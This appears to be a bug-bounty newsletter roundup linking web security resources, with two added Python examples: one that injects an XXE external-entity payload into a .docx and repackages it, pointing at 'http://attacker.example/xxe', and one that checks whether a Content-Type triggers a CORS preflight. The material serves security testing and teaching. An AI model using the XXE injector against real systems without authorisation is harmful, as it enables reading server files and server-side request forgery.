Subdomain takeovers are not my thing, but if they’re yours, go and read this guide. It describes not only techniques for finding subdomain takeovers but also multiple ways to exploit them to show the maximum impact....
#81
The website with known CSP bypasses
Renniepak created a website where we can all find known CSP bypasses. It’s great because I’m nowhere near remembering all these and, unfortunately, I also don’t have a habit of writing these things down when I encounter them. Not to mention they are difficult to...
Using YouTube to steal your files
This writeup involves multiple open redirects, iframes, and then more open redirects, and ends with a clickjacking attack that gives the attacker access to your GDrive files. It is also another example that if you actually understand clickjacking and you create a good POC,...
Beyond XSS: Explore the Web Front-end Security Universe
This is an excellent resource about XSS and other client-side bugs! It describes a lot of techniques, like mXSS, CSS injection, cookie bombing and many more: things at such a level that you rarely find one resource gathering as many of them....
Automating XXE hunt with AI
Personally, I don’t test for XXEs as often as I should. One of the reasons is that, especially for a docx-based XXE, it’s quite a lot of work to insert the payload, repackage the archive, etc. STÖK is someone who loves XXE, and he wrote a series of tweets describing how...
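The "insert the payload, repackage the archive" step is the part that is easy to script. The block below is an added example written for this page, not STÖK's tooling or the blog author's code: it treats a .docx as the OOXML zip it is, rewrites `word/document.xml` with a DOCTYPE that declares an external entity, references that entity from the first `<w:t>` text run, and repackages the zip with every other member untouched. The minimal document built by `make_minimal_docx()` is constructed for the example, and the entity URL passed to `inject_xxe()` is a placeholder you replace with your own `file://` or collaborator URL; the `_XML_DECL`, `_FIRST_T` and `build_xxe_document_xml` names are mine.

```python
"""Added example: inject an XXE payload into a .docx and repackage it.
Not STOK's or the blog author's code; the sample document is constructed here."""
import io
import re
import zipfile

# Constructed minimal OOXML package: the three parts most parsers need
# to accept the file as a Word document.
_CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
)
_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    '</Relationships>'
)
_DOCUMENT = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>placeholder</w:t></w:r></w:p></w:body></w:document>'
)


def make_minimal_docx() -> bytes:
    """Build the constructed sample .docx in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", _CONTENT_TYPES)
        zf.writestr("_rels/.rels", _RELS)
        zf.writestr("word/document.xml", _DOCUMENT)
    return buf.getvalue()


_XML_DECL = re.compile(r"^<\?xml[^>]*\?>\s*")
# First <w:t> text run; <w:t> may carry attributes such as xml:space="preserve".
_FIRST_T = re.compile(r"(<w:t(?:\s[^>]*)?>)(.*?)(</w:t>)", re.S)


def build_xxe_document_xml(document_xml: str, entity_url: str, entity_name: str = "xxe") -> str:
    """Return document.xml with a DOCTYPE declaring an external entity (hypothetical
    URL supplied by the caller) and the first text run replaced by a reference to it."""
    m = _XML_DECL.match(document_xml)
    decl, rest = (m.group(0), document_xml[m.end():]) if m else ("", document_xml)
    root = re.match(r"<([\w:]+)", rest)  # DOCTYPE must name the root element (w:document)
    if root is None:
        raise ValueError("no root element in document.xml")
    if not _FIRST_T.search(rest):
        raise ValueError("no <w:t> text run to carry the entity reference")
    doctype = f'<!DOCTYPE {root.group(1)} [<!ENTITY {entity_name} SYSTEM "{entity_url}">]>'
    rest = _FIRST_T.sub(lambda t: f"{t.group(1)}&{entity_name};{t.group(3)}", rest, count=1)
    return decl + doctype + rest


def inject_xxe(docx: bytes, entity_url: str, member: str = "word/document.xml") -> bytes:
    """Repackage the docx with `member` replaced by its XXE-carrying version;
    all other members keep their names, order and bytes."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                data = build_xxe_document_xml(data.decode("utf-8"), entity_url).encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()


def member_names(docx: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        return zf.namelist()


def document_xml(docx: bytes, member: str = "word/document.xml") -> str:
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        return zf.read(member).decode("utf-8")


if __name__ == "__main__":
    # Placeholder URL: point it at your own listener or a file:// path when testing.
    poisoned = inject_xxe(make_minimal_docx(), "http://attacker.example/xxe")
    with open("xxe.docx", "wb") as fh:
        fh.write(poisoned)
    print(document_xml(poisoned))
```

To use it against a real target document, pass the bytes of an actual .docx to `inject_xxe()` instead of the constructed one; the function only touches the member you name, so styles, media and relationship parts survive repackaging. A parser that ignores the DOCTYPE will simply render `&xxe;` unresolved, which is itself a useful negative signal.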
Content-Type research
BlackFan has a great GitHub repo with research about the Content-Type header. If you want to see which response content types allow XSS, or which request Content-Type values cause a CORS preflight request to be sent, this is the place to go....
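Whether a request Content-Type triggers a preflight is not a per-browser table but a rule from the Fetch standard's "CORS-safelisted request-header" check, and it is short enough to implement. The block below is an added example of my own (not BlackFan's research or code) that applies that rule: the value must be at most 128 bytes, must contain no CORS-unsafe byte (controls other than tab, DEL, and the delimiters `"():<>?@[\]{}`), must parse as a MIME type, and its type/subtype essence must be one of the three safelisted ones. The MIME parse is simplified to the parts the rule needs (type, subtype, parameter boundary); parameter values are not parsed because only the essence matters.

```python
"""Added example: decide whether a request Content-Type value is CORS-safelisted
(no preflight) under the Fetch standard's rule. My own code, not BlackFan's."""
import re

SAFELISTED_ESSENCES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}

# HTTP token code points (RFC 7230 tchar): what a MIME type and subtype may contain.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_HTTP_WS = "\t\n\r "

# CORS-unsafe request-header bytes: any control byte except HT, DEL, and the
# delimiters below. One of these anywhere in the value forces a preflight.
_UNSAFE_BYTES = (set(range(0x00, 0x20)) - {0x09}) | {
    0x22, 0x28, 0x29, 0x3A, 0x3C, 0x3E, 0x3F, 0x40,
    0x5B, 0x5C, 0x5D, 0x7B, 0x7D, 0x7F,
}


def mime_essence(value: str):
    """Simplified 'parse a MIME type' from the MIME Sniffing standard: returns the
    lower-cased type/subtype essence, or None when the value does not parse."""
    s = value.strip(_HTTP_WS)
    slash = s.find("/")
    if slash == -1:
        return None
    type_ = s[:slash]
    if not _TOKEN.match(type_):          # also rejects an empty type
        return None
    semi = s.find(";", slash + 1)
    subtype = s[slash + 1:] if semi == -1 else s[slash + 1:semi]
    subtype = subtype.rstrip(_HTTP_WS)
    if not _TOKEN.match(subtype):        # comma, space, slash etc. make the parse fail
        return None
    return f"{type_}/{subtype}".lower()


def is_cors_safelisted_content_type(value: str) -> bool:
    """True when a cross-origin request carrying this Content-Type can be sent
    without a preflight, per the Fetch standard's CORS-safelisted request-header rule."""
    raw = value.encode("utf-8")
    if len(raw) > 128:
        return False
    if any(b in _UNSAFE_BYTES for b in raw):
        return False
    return mime_essence(value) in SAFELISTED_ESSENCES


def needs_preflight(content_type: str) -> bool:
    return not is_cors_safelisted_content_type(content_type)


if __name__ == "__main__":
    for ct in ("text/plain", "application/json", "text/plain, application/json",
               'multipart/form-data; boundary="abc"'):
        print(f"{ct!r}: preflight={needs_preflight(ct)}")
```

Two of the cases in the demo are the ones worth remembering when probing an endpoint: `text/plain, application/json` does not parse as a single MIME type, so it is not safelisted, and a quoted `boundary="abc"` on an otherwise safelisted `multipart/form-data` still triggers a preflight because `"` is a CORS-unsafe byte. Case does not matter for the essence, and parameters such as `charset` are ignored by the rule.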
5 things that skyrocketed my bug bounty progress in 2024
My bug bounty game skyrocketed in 2024 compared to previous years. After only three quarters, I had already submitted many more reports than in 2023 and earned more than double my 2023 bug bounty income. I also participated in two rounds of the HackerOne Ambassador World Cup...